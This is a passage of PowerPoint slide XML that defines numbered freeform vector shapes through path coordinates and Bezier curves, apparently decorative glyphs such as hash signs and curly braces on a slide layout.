                      <a:pt x="127" y="151"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="112" y="218"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="91" y="218"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="151"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="151"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="218"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="218"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="151"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="151"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="134"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="134"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="96" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="124" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="138" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="159" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="145" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="189" y="66"/>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Freeform 387"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4502"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Freeform 388"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="469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Freeform 389"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4894"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Freeform 390"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5043" y="374"/>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Freeform 391"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5241" y="372"/>
                <a:ext cx="82"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Freeform 392"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5389"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Freeform 393"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5539"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Freeform 394"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5687"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Freeform 395"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5877" y="379"/>
                <a:ext cx="78" cy="293"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 64 w 64"/>
                  <a:gd name="T1" fmla="*/ 240 h 240"/>
                  <a:gd name="T2" fmla="*/ 22 w 64"/>
                  <a:gd name="T3" fmla="*/ 198 h 240"/>
                  <a:gd name="T4" fmla="*/ 22 w 64"/>
                  <a:gd name="T5" fmla="*/ 157 h 240"/>
                  <a:gd name="T6" fmla="*/ 0 w 64"/>
                  <a:gd name="T7" fmla="*/ 128 h 240"/>
                  <a:gd name="T8" fmla="*/ 0 w 64"/>
                  <a:gd name="T9" fmla="*/ 112 h 240"/>
                  <a:gd name="T10" fmla="*/ 22 w 64"/>
                  <a:gd name="T11" fmla="*/ 82 h 240"/>
                  <a:gd name="T12" fmla="*/ 22 w 64"/>
                  <a:gd name="T13" fmla="*/ 42 h 240"/>
                  <a:gd name="T14" fmla="*/ 64 w 64"/>
                  <a:gd name="T15" fmla="*/ 0 h 240"/>
                  <a:gd name="T16" fmla="*/ 64 w 64"/>
                  <a:gd name="T17" fmla="*/ 17 h 240"/>
                  <a:gd name="T18" fmla="*/ 42 w 64"/>
                  <a:gd name="T19" fmla="*/ 44 h 240"/>
                  <a:gd name="T20" fmla="*/ 42 w 64"/>
                  <a:gd name="T21" fmla="*/ 84 h 240"/>
                  <a:gd name="T22" fmla="*/ 21 w 64"/>
                  <a:gd name="T23" fmla="*/ 119 h 240"/>
                  <a:gd name="T24" fmla="*/ 21 w 64"/>
                  <a:gd name="T25" fmla="*/ 120 h 240"/>
                  <a:gd name="T26" fmla="*/ 42 w 64"/>
                  <a:gd name="T27" fmla="*/ 155 h 240"/>
                  <a:gd name="T28" fmla="*/ 42 w 64"/>
                  <a:gd name="T29" fmla="*/ 194 h 240"/>
                  <a:gd name="T30" fmla="*/ 47 w 64"/>
                  <a:gd name="T31" fmla="*/ 216 h 240"/>
                  <a:gd name="T32" fmla="*/ 64 w 64"/>
                  <a:gd name="T33" fmla="*/ 223 h 240"/>
                  <a:gd name="T34" fmla="*/ 64 w 64"/>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240"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="36" y="240"/>
                      <a:pt x="22" y="226"/>
                      <a:pt x="22" y="198"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="22" y="157"/>
                      <a:pt x="22" y="157"/>
                      <a:pt x="22" y="157"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="22" y="138"/>
                      <a:pt x="14" y="129"/>
                      <a:pt x="0" y="128"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="112"/>
                      <a:pt x="0" y="112"/>
                      <a:pt x="0" y="112"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="14" y="111"/>
                      <a:pt x="22" y="101"/>
                      <a:pt x="22" y="82"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="22" y="42"/>
                      <a:pt x="22" y="42"/>
                      <a:pt x="22" y="42"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="22" y="14"/>
                      <a:pt x="36" y="0"/>
                      <a:pt x="64" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="64" y="17"/>
                      <a:pt x="64" y="17"/>
                      <a:pt x="64" y="17"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="49" y="17"/>
                      <a:pt x="42" y="26"/>
                      <a:pt x="42" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="42" y="84"/>
                      <a:pt x="42" y="84"/>
                      <a:pt x="42" y="84"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="42" y="103"/>
                      <a:pt x="35" y="115"/>
                      <a:pt x="21" y="119"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="21" y="120"/>
                      <a:pt x="21" y="120"/>
                      <a:pt x="21" y="120"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="35" y="124"/>
                      <a:pt x="42" y="136"/>
                      <a:pt x="42" y="155"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="42" y="194"/>
                      <a:pt x="42" y="194"/>
                      <a:pt x="42" y="194"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="42" y="205"/>
                      <a:pt x="43" y="212"/>
                      <a:pt x="47" y="216"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="50" y="220"/>
                      <a:pt x="55" y="223"/>
                      <a:pt x="64" y="223"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="64"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Freeform 396"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5985" y="379"/>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4 h 240"/>
                  <a:gd name="T14" fmla="*/ 21 w 63"/>
                  <a:gd name="T15" fmla="*/ 155 h 240"/>
                  <a:gd name="T16" fmla="*/ 42 w 63"/>
                  <a:gd name="T17" fmla="*/ 120 h 240"/>
                  <a:gd name="T18" fmla="*/ 42 w 63"/>
                  <a:gd name="T19" fmla="*/ 119 h 240"/>
                  <a:gd name="T20" fmla="*/ 21 w 63"/>
                  <a:gd name="T21" fmla="*/ 84 h 240"/>
                  <a:gd name="T22" fmla="*/ 21 w 63"/>
                  <a:gd name="T23" fmla="*/ 44 h 240"/>
                  <a:gd name="T24" fmla="*/ 0 w 63"/>
                  <a:gd name="T25" fmla="*/ 17 h 240"/>
                  <a:gd name="T26" fmla="*/ 0 w 63"/>
                  <a:gd name="T27" fmla="*/ 0 h 240"/>
                  <a:gd name="T28" fmla="*/ 41 w 63"/>
                  <a:gd name="T29" fmla="*/ 42 h 240"/>
                  <a:gd name="T30" fmla="*/ 41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1" y="138"/>
                      <a:pt x="41" y="157"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="41" y="198"/>
                      <a:pt x="41" y="198"/>
                      <a:pt x="41" y="198"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="41" y="226"/>
                      <a:pt x="27" y="240"/>
                      <a:pt x="0" y="240"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="223"/>
                      <a:pt x="0" y="223"/>
                      <a:pt x="0" y="223"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="8" y="223"/>
                      <a:pt x="13" y="220"/>
                      <a:pt x="16" y="216"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="20" y="212"/>
                      <a:pt x="21" y="204"/>
                      <a:pt x="21" y="194"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="21" y="155"/>
                      <a:pt x="21" y="155"/>
                      <a:pt x="21" y="155"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="21" y="136"/>
                      <a:pt x="28" y="124"/>
                      <a:pt x="42" y="120"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="42" y="119"/>
                      <a:pt x="42" y="119"/>
                      <a:pt x="42" y="119"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="28" y="115"/>
                      <a:pt x="21" y="103"/>
                      <a:pt x="21" y="84"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="21" y="44"/>
                      <a:pt x="21" y="44"/>
                      <a:pt x="21" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="21" y="26"/>
                      <a:pt x="14" y="17"/>
                      <a:pt x="0" y="17"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="0"/>
                      <a:pt x="0" y="0"/>
                      <a:pt x="0" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="27" y="0"/>
                      <a:pt x="41" y="14"/>
                      <a:pt x="41" y="42"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="41" y="82"/>
                      <a:pt x="41" y="82"/>
                      <a:pt x="41" y="82"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="41"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Freeform 397"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6092"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 name="Freeform 398"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6240"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7"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Freeform 399"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="643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Freeform 400"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6634"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401"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6781"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Freeform 402"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6978"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403"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="712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Freeform 404"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7325"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405"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7473" y="374"/>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1" y="203"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="52" y="203"/>
                      <a:pt x="43" y="201"/>
                      <a:pt x="35" y="196"/>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406"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7671"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Freeform 407"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3461" y="36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8"/>
                      <a:pt x="72" y="199"/>
                      <a:pt x="68" y="202"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="66" y="203"/>
                      <a:pt x="64" y="204"/>
                      <a:pt x="63" y="205"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="58" y="208"/>
                      <a:pt x="54" y="209"/>
                      <a:pt x="48" y="207"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="43" y="206"/>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7"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1" y="162"/>
                      <a:pt x="3" y="160"/>
                      <a:pt x="7" y="160"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="10" y="160"/>
                      <a:pt x="12" y="160"/>
                      <a:pt x="14" y="159"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="19" y="158"/>
                      <a:pt x="22" y="155"/>
                      <a:pt x="23" y="150"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="23" y="150"/>
                      <a:pt x="23" y="150"/>
                      <a:pt x="23" y="150"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="25" y="153"/>
                      <a:pt x="23" y="160"/>
                      <a:pt x="17" y="161"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="15" y="162"/>
                      <a:pt x="12" y="163"/>
                      <a:pt x="9" y="162"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9" y="162"/>
                      <a:pt x="9" y="162"/>
                      <a:pt x="9" y="162"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="5" y="162"/>
                      <a:pt x="3" y="164"/>
                      <a:pt x="4" y="168"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="5" y="169"/>
                      <a:pt x="6" y="171"/>
                      <a:pt x="6" y="172"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="8" y="176"/>
                      <a:pt x="8" y="180"/>
                      <a:pt x="6" y="183"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="6" y="185"/>
                      <a:pt x="5" y="186"/>
                      <a:pt x="5" y="188"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4" y="190"/>
                      <a:pt x="4" y="192"/>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2"/>
                      <a:pt x="26" y="131"/>
                      <a:pt x="27" y="130"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="30" y="125"/>
                      <a:pt x="33"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9"/>
                      <a:pt x="154" y="151"/>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1" y="189"/>
                      <a:pt x="121" y="192"/>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4"/>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6"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="102" y="67"/>
                      <a:pt x="102" y="68"/>
                      <a:pt x="102" y="68"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="101" y="69"/>
                      <a:pt x="100" y="69"/>
                      <a:pt x="99" y="69"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="95" y="71"/>
                      <a:pt x="91" y="74"/>
                      <a:pt x="87" y="77"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="85" y="79"/>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2"/>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8"/>
                      <a:pt x="63" y="178"/>
                      <a:pt x="62" y="178"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="63" y="180"/>
                      <a:pt x="65" y="182"/>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4" y="174"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="114" y="173"/>
                      <a:pt x="115" y="172"/>
                      <a:pt x="115" y="173"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="116" y="173"/>
                      <a:pt x="116"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8"/>
                      <a:pt x="140" y="136"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="145" y="119"/>
                      <a:pt x="136" y="97"/>
                      <a:pt x="126" y="92"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="131" y="97"/>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8"/>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8" y="44"/>
                      <a:pt x="107" y="40"/>
                      <a:pt x="105" y="35"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="104" y="32"/>
                      <a:pt x="100" y="29"/>
                      <a:pt x="96" y="30"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="91" y="30"/>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7" y="33"/>
                      <a:pt x="66" y="35"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="63" y="40"/>
                      <a:pt x="63" y="45"/>
                      <a:pt x="66" y="50"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="66" y="50"/>
                      <a:pt x="67" y="51"/>
                      <a:pt x="68" y="51"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="69" y="51"/>
                      <a:pt x="69" y="50"/>
                      <a:pt x="69" y="49"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="69" y="49"/>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3"/>
                      <a:pt x="66" y="54"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="65" y="54"/>
                      <a:pt x="65" y="56"/>
                      <a:pt x="64" y="57"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="63" y="58"/>
                      <a:pt x="64" y="59"/>
                      <a:pt x="65" y="60"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="66" y="61"/>
                      <a:pt x="67" y="61"/>
                      <a:pt x="68" y="62"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="70" y="66"/>
                      <a:pt x="74" y="66"/>
                      <a:pt x="78" y="66"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="82" y="66"/>
                      <a:pt x="87" y="65"/>
                      <a:pt x="91" y="64"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="94" y="63"/>
                      <a:pt x="98" y="62"/>
                      <a:pt x="101" y="58"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="101" y="58"/>
                      <a:pt x="102" y="58"/>
                      <a:pt x="103" y="58"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="103" y="59"/>
                      <a:pt x="103" y="60"/>
                      <a:pt x="103" y="60"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="103" y="61"/>
                      <a:pt x="102" y="61"/>
                      <a:pt x="102" y="61"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="97" y="63"/>
                      <a:pt x="91" y="65"/>
                      <a:pt x="86" y="67"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="83" y="69"/>
                      <a:pt x="79"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2" y="43"/>
                      <a:pt x="72" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="71" y="45"/>
                      <a:pt x="72"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408"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3551" y="424"/>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409"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3564" y="42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Freeform 410"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2004"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411"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2152"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412"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="23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413"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2497"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414"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2692"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415"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2890"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Freeform 416"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3032" y="1108"/>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2"/>
                      <a:pt x="21" y="102"/>
                      <a:pt x="21" y="83"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="21" y="43"/>
                      <a:pt x="21" y="43"/>
                      <a:pt x="21" y="43"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="21" y="15"/>
                      <a:pt x="35" y="0"/>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417"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3140" y="1108"/>
                <a:ext cx="77"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7 h 241"/>
                  <a:gd name="T12" fmla="*/ 22 w 64"/>
                  <a:gd name="T13" fmla="*/ 195 h 241"/>
                  <a:gd name="T14" fmla="*/ 22 w 64"/>
                  <a:gd name="T15" fmla="*/ 156 h 241"/>
                  <a:gd name="T16" fmla="*/ 43 w 64"/>
                  <a:gd name="T17" fmla="*/ 121 h 241"/>
                  <a:gd name="T18" fmla="*/ 43 w 64"/>
                  <a:gd name="T19" fmla="*/ 120 h 241"/>
                  <a:gd name="T20" fmla="*/ 22 w 64"/>
                  <a:gd name="T21" fmla="*/ 85 h 241"/>
                  <a:gd name="T22" fmla="*/ 22 w 64"/>
                  <a:gd name="T23" fmla="*/ 45 h 241"/>
                  <a:gd name="T24" fmla="*/ 0 w 64"/>
                  <a:gd name="T25" fmla="*/ 18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7"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="21" y="212"/>
                      <a:pt x="22" y="205"/>
                      <a:pt x="22" y="195"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="22" y="156"/>
                      <a:pt x="22" y="156"/>
                      <a:pt x="22" y="156"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="22" y="136"/>
                      <a:pt x="29" y="125"/>
                      <a:pt x="43" y="121"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="43" y="120"/>
                      <a:pt x="43" y="120"/>
                      <a:pt x="43" y="120"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="29" y="116"/>
                      <a:pt x="22" y="104"/>
                      <a:pt x="22" y="85"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="22" y="45"/>
                      <a:pt x="22" y="45"/>
                      <a:pt x="22" y="45"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="22" y="27"/>
                      <a:pt x="15" y="18"/>
                      <a:pt x="0" y="18"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="0"/>
                      <a:pt x="0" y="0"/>
                      <a:pt x="0" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="28" y="0"/>
                      <a:pt x="42" y="15"/>
                      <a:pt x="42" y="43"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="42" y="83"/>
                      <a:pt x="42" y="83"/>
                      <a:pt x="42" y="83"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="42" y="102"/>
                      <a:pt x="49" y="112"/>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418"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3248"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420"/>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3395"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21"/>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3590"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22"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3788"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23"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3938"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24"/>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4085"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5"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4284"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6"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4433" y="1103"/>
              <a:ext cx="82"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7"/>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4581"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8"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
